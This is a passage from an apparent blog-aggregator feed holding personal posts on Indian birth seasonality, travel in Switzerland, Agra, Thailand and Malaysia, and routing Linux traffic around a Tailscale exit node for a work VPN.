(September).\n\nTaking an average can sometimes hide a tonne of information that lies in time-series data. If we look at the entire period between January 2008 and December 2020, the “seasonality” is easier to spot. From 2008 to 2020, the birth curve rises and dips over the year. The peaks happen around September\u002FOctober, while April registers a deep dip.\n\nWhile the data from HMIS is on births, we can infer the time of conception by simple arithmetic - subtracting 9 months. Of course, the seasonality remains intact. The peak of conceptions happens in December of the previous year or January of the same year.\n\nSummarizing information at the country level is a good starting point. Overall, September is the month with the highest number of birthdays. But does that hold across all states? What about Rajasthan? I next broke it down at the state level and annotated the month with the highest number of birthdays.\n\nFrom the figure above, August is the month with the highest number of birthdays in Rajasthan. But more importantly, the figure highlights the diversity that underlies India. While September, the month with the highest number of total births, is the month of peak births in 9 states, October is the peak month in 10 states. But there are also Meghalaya and Tripura, which peak in January and December, respectively. On the other extreme, July is the month of the least conceptions across multiple states. We can flip the births and look at the conception curve.\n\nWhile my actual question was answered, and I discovered that there is heterogeneity within the country in how it celebrates birthdays, my related question of understanding why this happens “mechanistically” remained unanswered. I must admit beforehand that it is also a hard question to answer without access to a tonne of data.\nWhy are conceptions higher in a month? 
Why do they vary across states? Is it driven by the “wedding season” in the country?\nI did not have access to the wedding registration data. So I asked a simple question: does temperature affect the rate of conception (and hence birth) in India? Surprisingly, getting temperature data for a city across a time span without paying anyone remains a non-trivial task. However, after a bit of a tussle and jumping through language hoops, I was able to download the gridded temperature data from IMD, Pune.\nTo understand the relationship between temperature and rate of conceptions, I looked at the average temperature over 2008-2020 in a state and calculated its correlation with the number of estimated conceptions. For the autumn months (October\u002FNovember), the correlation coefficient is the highest (-0.56). But even more importantly, this figure hinted at the seasonality being associated with temperature. The rate of conceptions across seasons varies as Winter > Autumn > Summer > Monsoon.\nI am sure you are thinking about heterogeneity: what does this relationship look like if we focus on each state individually?\n\nWhen I broke down the association analysis for each state individually and arranged the states based on the strength of the correlation (between the relative percentage of conceptions every month and the mean temperature in each state), a beautiful pattern emerged. 24 out of 28 states for which I had data show a correlation coefficient of -0.5 or lower (that is, the absolute strength of correlation exceeds 0.5). For states like Manipur, Bihar, and Haryana, the correlation between temperature and rate of conception is as strong as -0.91, implying that higher temperatures are associated with fewer conceptions; if this relationship were indeed causal, a drop in temperature would translate into a marked rise in conceptions. States like Jammu and Kashmir and Uttarakhand, which are usually colder, have weak associations, while Kerala, which has a tropical climate, has a stronger association with a correlation coefficient of -0.82. Thus, the association is not as strong for colder climates, an observation I had already made at the season level in the earlier plot.\n\nCausality is hard to prove here. We have strong associations that reproduce across states, Occam’s razor, and the golden fact that correlation does not imply causation. I wish the answer were as simple as those birthday parties.\n\nSummer has come and passed  \nThe innocent can never last  \nWake me up when September ends\n\n                - Billie Joe Armstrong",[],{"slug":987,"title":988,"link":989,"pubDate":990,"contentSnippet":991,"tags":992,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"random-kind-stranger","A Random Act of Kindness","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Frandom-kind-stranger\u002F","2024-04-21T00:00:00.000Z","Last month, I took a wonderful trip through the scenic landscapes of Switzerland. My wife and I were in Lucerne and had scheduled a day trip to Mt. Titlis for the next day but were wondering what to do that evening. After strolling along the Chapel Bridge and enjoying an amazing lunch by the waterfront, we decided to book a Lake Lucerne cruise for the evening. 
It seemed like the perfect setup for a romantic date night, or so I thought!\n\nWe got the tickets for the evening from the information booth and went back to our hotel to freshen up and relax for a bit.\nWe arrived exactly at 6:45 PM, as mentioned on our tickets, and started to wait. Except, there were only the two of us waiting. We waited for probably half an hour, until 7:15 PM, which was the departure time. Knowing how precise the Swiss transport system usually is, I sensed something fishy. Luckily, I spotted Martin, a staff member of the cruise company, and asked him about it. He looked puzzled by my question and informed me that there was no cruise scheduled for today. Yep, not today, not tomorrow, and not for the rest of the weekend. It was Easter time, and all the cruise trips were cancelled. In fact, he was as puzzled as I was about how the lady at the ticket counter had even sold us tickets for that day. However, he told me that he couldn’t do much and suggested writing an email for a refund. I was a bit sad as this dashed our evening plans, but I thought, fine… Shit happens. It’s not the end of the world!\nAnd then, out of nowhere, by pure serendipity, my wife spotted another member of the cruise crew—this time, in fact, the captain! She began to tell the captain about our ordeal. The captain, a very warm and kind lady, listened to my wife patiently and understood our plight! She apologized on behalf of her company and immediately offered a refund in cash for the tickets that we had purchased. We were quite happy, as following up on refund emails was not something I wanted hanging over the other half of my trip. So we said yes, except she needed to go to the ATM to withdraw cash. We waited for her and chatted with Martin about random stuff! He told us some really fun stories about how Toblerone’s iconic packaging no longer features the Matterhorn mountain. He also shared practical advice on how to safeguard oneself against pickpockets in Italy (we were going to visit soon), and reminisced about his life in Zermatt before relocating to Lucerne.\nAnyway, the wait stretched longer than expected, and I found myself wondering about her whereabouts. And then finally, we saw her approaching us. She told us that she hadn’t found a working ATM nearby, and had to go a bit far. But she didn’t come back empty-handed; she also brought us macaroons as a token of her apologies, a gesture that was incredibly thoughtful. She handed us 200 CHF in cash, more than the 180 CHF we had paid for our tickets. Despite our insistence on returning the excess 20 CHF, she remained steadfast, refusing to accept it. She encouraged us to use the extra money to enjoy a few drinks, suggesting it as a consolation for our evening plans being spoiled by the cancelled cruise.\n\nI am glad the cruise didn’t happen. Life has its own ways of revealing that kindness exists in every corner of the world, and serendipity can lead to the most memorable encounters! For most, it may not be a huge thing, but for me, it was a profoundly touching and generous act from a stranger who simply chose to be kind without any ulterior motives.\nThe lesson: Be kind to others, do no harm, and always pay it forward. 
:)\nFin!",[],{"slug":994,"title":995,"link":996,"pubDate":997,"contentSnippet":998,"tags":999,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"dying-excitement-of-festivals","The Dying Excitement Of Festivals","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fdying-excitement-of-festivals\u002F","Sat, 06 Apr 2024 13:09:55 +0000","I don’t know why, but since 2020 (the COVID era) festivals don’t feel the same anymore. I used to have that excitement and would eagerly wait for Holi (and other festivals). Maybe it’s because I have grown up? But that doesn’t explain why others feel the same. Somehow I think this is related to the growth of short-form content on the Internet, like Instagram Reels and TikTok. People are busy scrolling and the algorithm is busy feeding them; the cycle continues.",[],{"slug":1001,"title":1002,"link":1003,"pubDate":1004,"contentSnippet":1005,"tags":1006,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-12","Writing maketh the 10x Developer. More so the 10x development team.","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwriting-maketh-the-10x-developer\u002Findex.html","Fri, 05 Apr 2024 00:00:00 +0000","Writing is thinking. Software is people's thoughts on repeat. Developers who can pen their thoughts clearly multiply their impact. This matters even more in group work. Common sense rules; no literature major necessary.",[49,55,54,243,53,246,227],{"slug":1008,"title":1009,"link":1010,"pubDate":1011,"contentSnippet":1012,"tags":1013,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"taj-mahal","A visit to the Taj Mahal","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ftaj-mahal\u002F","Fri, 29 Mar 2024 15:43:21 +0530","Introduction\nI visited the Taj Mahal this month with my friend Badri. The Taj Mahal is a major tourist attraction, drawing 7-8 million visitors per year. It is one of the most beautiful pieces of architecture.\nJourney to Agra\nThe Taj Mahal is in the city of Agra, which is 188 km from Delhi by train. We had booked a train by the name of Taj Express from Hazrat Nizamuddin station in Delhi to Agra Cantt railway station. The night before the journey, we stayed in a retiring room at Old Delhi railway station because we could not get one at Hazrat Nizamuddin station. Retiring rooms are accommodations for passengers at railway stations, which require a confirmed train ticket to stay.\nOf all the retiring rooms I have been to, locating the ones at Old Delhi station was the most challenging. I recommend reading Badri’s blog post, where he details our experience with this and other retiring rooms.\n\n      \nOur retiring room at the Old Delhi Railway Station.\nThe next day, we barely reached Hazrat Nizamuddin station in time for the train. However, the train had not yet arrived at the station and was delayed by half an hour.\nArrival in Agra\nWe reached Agra Cantt station at 10:30 hours, where we stayed in a retiring room. Before heading out to the Taj Mahal, we rested in our rooms for a couple of hours and then had lunch at the station. As we came out of the station, we were approached by an autorickshaw driver who quoted the fare to the Taj Mahal as 150 INR. I negotiated the price down to 60 INR, which the driver agreed to on the condition of sharing the ride with other passengers. 
When we realized he was not making any effort to bring in more passengers to share the ride with, we walked away.\nAs we came out of the station complex, an autorickshaw driver offered a ride to the Taj Mahal for 20 INR per person on a sharing basis, or 100 INR for a reserved ride. We agreed to share the ride with other passengers for 20 INR, but the driver started driving as soon as we got in. We mistook the other person in the autorickshaw for a passenger we were sharing the ride with, but later found out that they were with the driver. Upon reaching the outer gate of the Taj Mahal, we paid him 40 INR as agreed, but he insisted that we had reserved the auto. We told him that we did not reserve the auto, but rather chose the sharing option. He insisted on this for some time. I suspect it was a scam, but we just walked away, and he didn’t pursue us further.\nExploring the Taj Mahal\nThe autorickshaw dropped us at one of the outer gates, from where we had to walk about 500 meters to reach the ticket counter just outside the west gate. We bought tickets worth 250 INR per person, which also allowed us to enter the mausoleum. Then we proceeded to the security check before entering the Taj Mahal complex.\n\n      \nSecurity outside the Taj Mahal complex.\n\n      \nThis red-colored building is the entrance to where you can see the Taj Mahal.\n\n      \nTaj Mahal.\nUpon entering, we saw red sandstone walls on three sides enclosing the Taj Mahal complex. We took photos using my phone and a Fujifilm camera. Later, we learned that we needed to cover our shoes before entering the mausoleum. We also saw a few people barefoot, but we couldn’t find a place to leave our shoes. We came out of the whole complex at 18:00 hours and had snacks with tea at a nearby shop. I also bought a fridge magnet as a souvenir for 30 INR.\n\n      \nShoe covers for going inside the mausoleum.\n\n      \nTaj Mahal from a side angle.\nOur next destination was Jaipur and we had booked our seats in a train from Agra Cantt station. We decided to walk towards the station, hoping to have dinner along the way. However, we could not find a place to eat. Since we had enjoyed the lunch at the station earlier, we went there for dinner as well, after which we boarded our train to Jaipur. On our way back to the station, I found the bus station for the Taj Mahal.\nExpenses\nThese were our expenses per person:\nDescription | Amount (Indian Rupees)\nRetiring room at Delhi Railway Station (12 hours) | 131\nTrain ticket from Delhi to Agra (Taj Express) | 110\nRetiring room at Agra Cantt station (12 hours) | 450\nAuto-rickshaw to Taj Mahal | 20\nTaj Mahal ticket (including entry to the mausoleum) | 250\nFood | 350\nTotal | 1,311",[],{"slug":1015,"title":1016,"link":1017,"pubDate":1018,"contentSnippet":1019,"tags":1020,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"travel-tailscale","Travelling with Tailscale","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Ftravel-tailscale\u002F","2024-03-27T00:00:00.000Z","I have an upcoming trip to Europe, which I am quite excited about. I wanted to set up a Tailscale exit node to ensure that critical apps I depend on, such as banking portals, continue working from outside the country. Tailscale provides a feature called “Exit nodes”. These nodes can be set up to route all traffic (0.0.0.0\u002F0, ::\u002F0) through them.\nI deployed a tiny DigitalOcean droplet in the BLR region and set up Tailscale as an exit node. 
The steps are quite simple and can be found here.\n# Enable IPv4\u002FIPv6 forwarding so the node can route traffic for other devices\n$ echo 'net.ipv4.ip_forward = 1' | sudo tee -a \u002Fetc\u002Fsysctl.d\u002F99-tailscale.conf\n$ echo 'net.ipv6.conf.all.forwarding = 1' | sudo tee -a \u002Fetc\u002Fsysctl.d\u002F99-tailscale.conf\n$ sudo sysctl -p \u002Fetc\u002Fsysctl.d\u002F99-tailscale.conf\n$ sudo tailscale up --advertise-exit-node\nThe node is now advertised as an exit node, and we can confirm that from the output of tailscale status:\n$ sudo tailscale status                       \n100.78.212.33   pop-os               mr-karan@    linux   -\n100.75.180.88   homelab              mr-karan@    linux   -\n100.100.191.57  iphone               mr-karan@    iOS     offline\n100.123.189.14  karans-macbook-pro   mr-karan@    macOS   offline\n100.104.67.7    lab                  mr-karan@    linux   offline\n100.108.220.87  tailscale-exit       mr-karan@    linux   active; exit node; direct 167.71.236.222:41641, tx 21540 rx 17356\nOn the client side, I was able to start Tailscale and configure it to send all the traffic to the exit node with:\nsudo tailscale up --exit-node=100.108.220.87\nWe can confirm that the traffic is going via the exit node by checking our public IP from this device:\n➜ curl  https:\u002F\u002Fipinfo.io \n{\n  \"ip\": \"167.x.x.222\",\n  \"city\": \"Doddaballapura\",\n  \"region\": \"Karnataka\",\n  \"country\": \"IN\",\n  \"loc\": \"13.2257,77.5750\",\n  \"org\": \"AS14061 DigitalOcean, LLC\",\n  \"postal\": \"560100\",\n  \"timezone\": \"Asia\u002FKolkata\",\n  \"readme\": \"https:\u002F\u002Fipinfo.io\u002Fmissingauth\"\n}                            \nHowever, I encountered a minor issue since I needed to bring my work laptop for on-call duties, in case any critical production incidents required my attention during my travels. At my organization, we use Netbird as our VPN, which, like Tailscale, creates a P2P overlay network between different devices.\nThe problem was that all 0.0.0.0\u002F0 traffic was routed to the exit node, meaning the internal traffic meant for Netbird to access internal sites on our private AWS VPC network was no longer routed via the Netbird interface.\nNetbird automatically propagates a bunch of IP routing rules when connected to the system. These routes are to our internal AWS VPC infrastructure. For example:\n10.0.0.0\u002F16 via 100.107.12.215 dev wt0\nHere, wt0 is the Netbird interface. So, for example, any IP like 10.0.1.100 will go via this interface. To verify this:\n$ ip route get 10.0.1.100\n10.0.1.100 dev wt0 src 100.107.12.215 uid 1000 \nHowever, after connecting to the Tailscale exit node, this was no longer the case. Now, even the private IP meant to be routed via Netbird was being routed through Tailscale:\n$ ip route get 10.0.1.100\n10.0.1.100 dev tailscale0 table 52 src 100.78.212.33 uid 1000 \nAlthough Tailscale nodes allow for the selective whitelisting of CIDRs to route only the designated network packets through them, my scenario was different. I needed to selectively bypass certain CIDRs and route all other traffic through the exit node. I came across a relevant GitHub issue, but unfortunately, it was closed due to limited demand.\nThis led me to dig deeper into understanding how Tailscale propagates IP routes, to see if there was a way for me to add custom routes with a higher priority.\nInitially, I examined the IP routes for Tailscale. Typically, one can view routes using ip route, which by default displays the routes in the main table. 
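For instance, both of the following are equivalent ways to inspect it (illustrative invocations only; the routes shown will depend on your system):\n$ ip route show\n$ ip route show table main\n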
However, Tailscale uses routing table 52 for its routes, instead of the default or main table.\n$ ip route show table 52                                                           \n\ndefault dev tailscale0 \n100.75.180.88 dev tailscale0 \n... others ...\nthrow 127.0.0.0\u002F8 \n192.168.29.0\u002F24 dev tailscale0 \nA few notes on the route table:\ndefault dev tailscale0 is the default route for this table. Traffic that doesn’t match any other route in this table will be sent through the tailscale0 interface. This ensures that any traffic not destined for a more specific route will go through the Tailscale network.\nthrow 127.0.0.0\u002F8: This is a special route that aborts the lookup in this table for traffic destined for 127.0.0.0\u002F8 (loopback addresses) and falls back to the remaining routing rules, keeping loopback traffic off the Tailscale interface.\nWe can see the priority in which these IP rules are evaluated using ip rule show:\n➜ ip rule show          \n0:\tfrom all lookup local\n5210:\tfrom all fwmark 0x80000\u002F0xff0000 lookup main\n5230:\tfrom all fwmark 0x80000\u002F0xff0000 lookup default\n5250:\tfrom all fwmark 0x80000\u002F0xff0000 unreachable\n5270:\tfrom all lookup 52\n32766:\tfrom all lookup main\n32767:\tfrom all lookup default\nThis command lists all the current policy routing rules, including their priority (look for the pref or priority value). Each rule is associated with a priority, with lower numbers having higher priority.\nBy default, Linux uses three routing tables:\nLocal (priority 0)\nMain (priority 32766)\nDefault (priority 32767)\nSince Netbird already propagates the IP routes in the main routing table, we only need to add a higher-priority rule to look up the main table before Tailscale’s table 52 takes over.\n$ sudo ip rule add to 10.0.0.0\u002F16 pref 5000 lookup main\nNow, our ip rule looks like:\n$ ip rule show          \n0:\tfrom all lookup local\n5000:\tfrom all to 10.0.0.0\u002F16 lookup main\n5210:\tfrom all fwmark 0x80000\u002F0xff0000 lookup main\n5230:\tfrom all fwmark 0x80000\u002F0xff0000 lookup default\n5250:\tfrom all fwmark 0x80000\u002F0xff0000 unreachable\n5270:\tfrom all lookup 52\n32766:\tfrom all lookup main\n32767:\tfrom all lookup default\nTo confirm whether the packets for destination 10.0.0.0\u002F16 get routed via wt0 instead of tailscale0, we can use the good ol’ ip route get:\n$ ip route get 10.0.1.100 \n10.0.1.100 dev wt0 src 100.107.12.215 uid 1000\nPerfect! This setup routes all our public traffic via the exit node, while the internal traffic meant for the AWS VPCs gets routed via the Netbird VPN.\nSince these rules are ephemeral and I wanted to add a bunch of similar rules, I created a small shell script to automate adding\u002Fdeleting them:\n#!\u002Fbin\u002Fbash\n\n# Function to add IP rules for specified CIDRs\nadd() {\n    echo \"Adding IP rules...\"\n    sudo ip rule add to 10.0.0.0\u002F16 pref 5000 lookup main\n    # ... others ...\n}\n\n# Function to remove IP rules based on preference numbers\nremove() {\n    echo \"Removing IP rules...\"\n    sudo ip rule del pref 5000\n    # ... 
others ....\n}\n\n# Check the first argument to determine which function to call\ncase $1 in\n    add)\n        add\n        ;;\n    remove)\n        remove\n        ;;\n    *)\n        echo \"Invalid argument: $1\"\n        echo \"Usage: $0 add|remove\"\n        exit 1\n        ;;\nesac\nFin!",[],{"slug":1022,"title":1023,"link":1024,"pubDate":1025,"contentSnippet":1026,"tags":1027,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"thailand-trip","Thailand Trip","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fthailand-trip\u002F","Fri, 22 Mar 2024 02:15:00 +0530","Arrival\nI was staying at a hostel in Bukit Bintang, a shopping hub and entertainment center of Kuala Lumpur, which was about 200 metres from the monorail station, where I took a metro train for KL Sentral. Then I took a bus from KL Sentral to the airport, followed by a Malaysia Airlines flight to Bangkok. Meals were included without any extra charge.\nThe flight took around 2 hours, landing in Bangkok’s Suvarnabhumi Airport at around 15:00 hours local time. My friend Fletcher was leaving for Pattaya from Bangkok; Pattaya is about 150 km away, a 2-hour bus ride, though it takes longer from within Bangkok city than from Suvarnabhumi Airport due to the traffic. We had planned to meet in Pattaya and had already booked a hostel there. At the bus counter, I came to know that buses leave for Pattaya every hour. However, the next bus for which tickets were available was scheduled to leave at 19:00 hours.\nThe ticket cost was 143 Thai Baht (360 Indian Rupees) per seat. This left me with a couple of hours at the airport, which I spent charging my phone, exploring shops and eating snacks I had packed. As I had one week to spend in Thailand, buying a SIM card was essential to have internet access on the go. The internet plans I checked at the airport were expensive compared to Kuala Lumpur, so I didn’t buy a SIM card from there, leaving me with no way to coordinate with Fletcher.\n\n      \nWelcome sign at Bangkok's Suvarnabhumi airport.\n\n      \nBus from Suvarnabhumi Airport to Jomtien Beach in Pattaya.\nPattaya\nMy bus left the airport at 7 PM and dropped me at the last stop, Jomtien Beach in Pattaya, at around 9 PM. The bus journey was smooth, thanks to good roads and the lack of traffic jams. I used the OsmAnd app for navigation and decided to walk to my hostel as it was around 1 km away. While walking, I noticed cannabis bars on the street side and ubiquitous massage parlors, not to mention the street prostitutes vying for your attention.\nAfter some time, I realized that the address mentioned on the hostel receipt was different from the one OpenStreetMap was showing, leading me to ask a person sitting at a café for help. That person agreed to help me and took me to the exact place where the hostel was. On the way, he told me he was originally from Kuwait but had lived in Pattaya for many years. He also told me about the cheap, shared hail-and-ride songthaew rides which run along Jomtien Beach, charging 10 Baht (25 Rupees) for any distance along that route, making our trip cost-effective.\n\n      \nPhoto of a songthaew in Pattaya. These songthaews run along Jomtien Second road and take 10 Thai Baht to anywhere on the route.\n\n      \nRoad near Jomtien beach in Pattaya\nI was at my hostel, but I was still not sure if I was at the correct place. There was no reception in sight, only a staircase. In the meantime, I bumped into Fletcher, and breathed a sigh of relief. 
Adjacent to the property was a hairdresser who helped us get into the hostel. This was my first time checking in to a hostel without a reception. It seemed like a shared room without service. After some time, we went outside and bought a SIM card for me at a 7-Eleven store. The cost was 399 Baht for 7 days of unlimited internet.\nThe next day, we went to Pattaya Tiger Park, where you can go inside the tiger’s cage and touch the tiger. Then we went to the nearby Floating Market but decided against going inside after seeing that the ticket prices were higher than we deemed worthwhile. After this, we walked towards Jomtien Beach, but I planned to hitchhike as it was very sunny, and our drinking water supply was getting depleted. A few cars passed by without responding, but a scooty stopped and picked us up. Initially, I thought he would let only one of us ride, but to my surprise he let both of us on it. During the ride, he told us he was from Delhi, and dropped us within walking distance of the bus station where Fletcher had to board his bus for Bangkok.\n\n      \nA welcome sign at Pattaya Floating market.\n\n      \nJomtien Beach in Pattaya.\nIn the evening, I went to a shop which was selling fruits like guavas, dragon fruits, and mangoes. I sampled the guavas, which I found tasty, and got mangoes and dragon fruits packed to eat later; they were yummy.\nBangkok\nThe next day, on 9th Feb, I left for Bangkok, taking a bus from the station where the bus from Suvarnabhumi Airport had dropped me earlier. I reached the airport in 2 hours and boarded a metro train from there to Huai Khwang, then walked to my hotel. The hotel room cost 5,600 INR for four days for a double bed. In Bangkok too, I found an abundance of convenience stores like 7-Eleven, similar to Pattaya and Kuala Lumpur. I had difficulty finding vegetarian food, as labels were in Thai and the staff didn’t know English.\n\n      \nA board showing coffee menu at a 7-Eleven store along with rates in Pattaya.\n\n      \nIn this section of 7-Eleven, you can buy a premix coffee and mix it with hot water provided at the store to prepare.\nThe next day, 10th Feb 2024, was Chinese New Year. I didn’t see a lot of celebrations in my area, but I saw celebratory programs and discount sales while I was in Kuala Lumpur, a few days before the Chinese New Year. In terms of food, I mainly relied on fruits. The pineapples were different from what I have seen in India, and this was the first time I saw bananas with yellow flesh. I tried Korean vegetable noodles, which were good. Another option was eating bread and cheese from the 7-Eleven. I also tried some Indian food like Chhole Kulche at Sukhumvit and a paneer dish at the Ratchada Night Market.\n\n      \nBanana with yellow flesh\n\n      \nFruits at a stall in Bangkok\n\n      \nTrimmed pineapples from Thailand.\n\n      \nCorn in Bangkok.\n\n      \nThis Korean Vegetasty noodles pack was yummy and was available at many 7-Eleven stores.\nI explored malls in Siam and the area around Sukhumvit. The highlight of my Bangkok trip was the Chao Phraya Express Boat, which sails on the Chao Phraya River and covers some important tourist destinations of Bangkok. I took the all-day river pass for 150 Thai Baht, which allows you to hop on and off any boat at any station for the day, only to realize later that it would have been cheaper to buy individual station tickets. I highly recommend taking the boat ride as it offers stunning views of the city. 
I went to Wat Arun, a famous Buddhist temple and a major tourist attraction. When I entered the temple after buying the ticket, they stamped my hand ;) Following this, I took a boat to the famous Khao San Road, which is known for cheap accommodation and food stalls.\n\n      \nWat Arun temple stamps your hand upon entry\n\n      \nWat Arun temple\n\n      \nKhao San Road\n\n      \nA food stall at Khao San Road\n\n      \nChao Phraya Express Boat\nI had booked a flight from Bangkok to Delhi with Air India, and during the flight, they were serving alcohol onboard. I decided to try red wine, marking my first experience of consuming alcohol while flying.\n\n      \nRed wine being served in Air India\nNotes\nThere are many malls in Bangkok and you can easily find toilets\u002Frestrooms, which helps avoid paying to use washrooms.\nCompared to Malaysia, I found Thailand more expensive, contrary to expectations. In addition, shopping in Malaysia was quite cheap due to Chinese New Year discounts, which I didn’t see in Thailand.\nI liked Pattaya more than Bangkok, mainly because Pattaya has a nice beach and I could engage with locals and foreigners there. Perhaps booking a hostel instead of a hotel in Bangkok would have given more opportunities to engage with people.",[],{"slug":1029,"title":1030,"link":1031,"pubDate":1032,"contentSnippet":1033,"tags":1034,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-13","Halting AI","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhalting-ai\u002Findex.html","Wed, 13 Mar 2024 00:00:00 +0000","The current wave of AI tools is incredibly cool. I hope more people get distracted by the incredible coolness and bet on this wave of AI, because I'm betting the other way, on the hot mess of human general intelligence.",[55,49,244,245,246],{"slug":1036,"title":1037,"link":1038,"pubDate":1039,"contentSnippet":1040,"tags":1041,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"malaysia-trip","Malaysia Trip","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fmalaysia-trip\u002F","Sat, 02 Mar 2024 19:29:59 +0530","Introduction\nIn January of this year, my friend Snehal invited me to Vienna, Austria, but our plans were thwarted when Austria refused me a visa. So, I thought about traveling to a country that does not require a visa, and a few candidates came to mind, one of them being Malaysia, which had recently waived visa requirements for Indian tourists. I also included Thailand, as it was visa-free, close to Malaysia, and one of the most popular tourist destinations in the world.\nI booked an AirAsia flight from Delhi, India, to Kuala Lumpur, Malaysia; a Malaysia Airlines flight from Kuala Lumpur to Bangkok; and an Air India ticket from Bangkok to Delhi.\nBoarding from the Delhi Airport\nOn the 31st of January, before boarding my flight to Kuala Lumpur, I went to the AirAsia counter to obtain my boarding pass. During this process, the airline staff asked me a range of questions, from the usual - such as my purpose of visit, hotel bookings, and return ticket - to the ridiculous, including requests for invoices of hotel bookings, email confirmations of my return ticket, and the amount of currency I was carrying.\nI didn’t have the invoices of my bookings as I didn’t pay for them in advance except for the first night, nor could I find the confirmation email from Air India. I was afraid that the airline staff might not give me the boarding pass, which is required to board the flight. 
I had never had such an experience at airports in other countries.\nThen I passed through immigration, where I was asked sensible questions such as my country of visit and return tickets. Following this, I went through the security check and proceeded to the flight’s boarding gate. Unfortunately, my flight was delayed by three hours. Even though AirAsia is a budget airline, I was surprised to find out that drinking water on the plane was not free of cost; only hot drinking water was. It was a direct flight, which took 5 hours to reach Kuala Lumpur. I landed at Kuala Lumpur’s KLIA2 airport at around 09:00 hours local time (which is 2 hours 30 minutes ahead of Indian time) on the 1st of Feb.\nDay 1: Arrival in Kuala Lumpur\nAfter arrival at the Kuala Lumpur airport, I went through immigration, where I was asked about my purpose of visit, the number of people accompanying me, the number of days of stay, and my return\u002Fonward tickets and hotel bookings.\n\n      \nKuala Lumpur International Airport.\nI had filled in the Malaysia Digital Arrival Card a day before my flight’s scheduled departure as per my travel agent’s advice, though the immigration officer didn’t ask for it. The immigration officer stamped my passport, after which I went through customs clearance. After clearing customs, I roamed around the airport and checked out SIM and internet plans, without buying anything.\n\n      \nMalaysian entry stamp on my passport.\nMalaysia’s currency is the Malaysian ringgit, abbreviated as MYR. One MYR was equivalent to 18 Indian Rupees (INR). I had exchanged currency for Malaysian ringgit at a money exchange in my hometown.\nMy stay was booked at a hostel called Travel Hub Guesthouse in the Chinatown area of Kuala Lumpur, which was within walking distance of the Pasar Seni metro station, known as an LRT station in local jargon. Every booking included a MYR 10 tourism tax per night. The hostel stay was 26.71 MYR plus 10 MYR (taxes), adding up to a total of 36.71 MYR (660 INR) per night.\nKL Sentral serves as the city center and is located about 50 km from the airport. The rapid train from the airport to KL Sentral costs 55 MYR (approximately 1,000 INR), which I found to be quite expensive. Instead, I opted for the bus, which was a more economical choice at 15 MYR (approximately 270 INR). The bus took about an hour to reach KL Sentral and had comfortable seats. The well-maintained roads made my overall journey smooth and offered a glimpse of Kuala Lumpur city.\n\n      \nInterior view of the bus.\nAs soon as I checked in and entered my room, I met an Indian named Fletcher, also a tourist, who had been in Kuala Lumpur for a couple of days. He was planning to visit the National Museum, and I joined him out of excitement for exploration, even though I was too tired after such a long trip and wanted to rest instead.\n\n      \nLRT at KL Sentral.\n\n      \nEntrance of Pasar Seni LRT station\n\n      \nRoom inside Travel Hub Guesthouse.\nIn the evening, I visited the National Museum (ticket was 5 MYR, equivalent to 90 INR) with Fletcher, and explored Little India, which had an abundance of Indian restaurants, many run by Tamils, making vegetarian food easily available. I came across a stall where I drank masala tea and sampled Mee Goreng. 
A quick search on the internet revealed that Mee Goreng is a dish unique to Indian immigrants in Malaysia and neighboring countries, but not found in India!\n\n      \nBoard welcoming us to Little India\n\n      \nMee Goreng, a dish made of noodles in Malaysia.\nDay 2: Visiting Batu Caves and Petronas Towers\nTo stay with Fletcher, I extended my stay at the same hostel for one night. The next day (February 2nd), Fletcher went on a day trip to the Genting Highlands. Although I had planned to join him, I couldn’t, because his bus had no seats available when we reached KL Sentral. I noticed that at the KL Sentral station, bus tickets need to be paid for using a card or can be booked online through websites like RedBus. They had a cash option at the KL airport, but not at KL Sentral.\nI took the opportunity to buy a local SIM card from the company CelcomDigi at the KL Sentral station for MYR 10, which included 5G internet up to 5 GB of usage. However, making calls required a recharge of MYR 5, which I didn’t opt for. At the bus ticket counter, I met a family from Delhi and joined them for a day trip to Batu Caves, which is a cave complex located on the outskirts of Kuala Lumpur.\nTo reach Batu Caves, we took the KTM Komuter train from KL Sentral station, which costs MYR 5.2 for a return journey. The train takes around 40 minutes to reach Batu Caves. Upon arrival, we could immediately see the shrine of Murugan outside Batu Caves. There were stairs leading to the caves. To take the stairs, make sure you cover your knees and shoulders. A woman from the family I went with was wearing shorts, so she had to buy a scarf worth MYR 15 to cover her knees for entry. After climbing the stairs, we went inside the Temple Cave. This particular cave doesn’t have an entry fee; however, some other caves (for example, the Ramayana Cave) do. I didn’t go to the Ramayana Cave because I didn’t know about it at the time.\n\n      \nKTM Komuter train\n\n      \nMurugan statue outside of Batu Caves.\n\n      \nView from the top after climbing all the stairs.\n\n      \nTemple inside the cave.\nIt was cooler inside the cave. We spent some time resting there. After we were done, we returned to KL Sentral and went our separate ways. I came back to the hostel and rested for some time.\nMy trip to Kuala Lumpur would be incomplete without a photo at the iconic Petronas Towers, which was my next destination. To get there from my hostel, I took the LRT to KLCC station and then walked to the photo point of the Petronas Towers, where I asked an Indonesian tourist to take my pictures.\n\n      \nMe at Petronas Towers.\nAfter roaming around the Petronas Towers, I called Fletcher, who was on his way back to KL Sentral, and we decided to meet there. We went to the same stall where we had Mee Goreng the previous day and ordered Ghee Roast Dosa this time. We also had nice conversations with a Malaysian family of Indian ancestry. Then, we went to another place to eat Roti Canai, which I had with dal. Interestingly, Roti Canai is another dish popularized by Indian immigrants in Southeast Asia, but it is not popular in India.\n\n      \nPhoto with Malaysians.\nDay 3: Berjaya Times Square and Bukit Bintang\nFor the third day (3rd Feb), I could not extend my hostel booking as it was fully booked due to the weekend. 
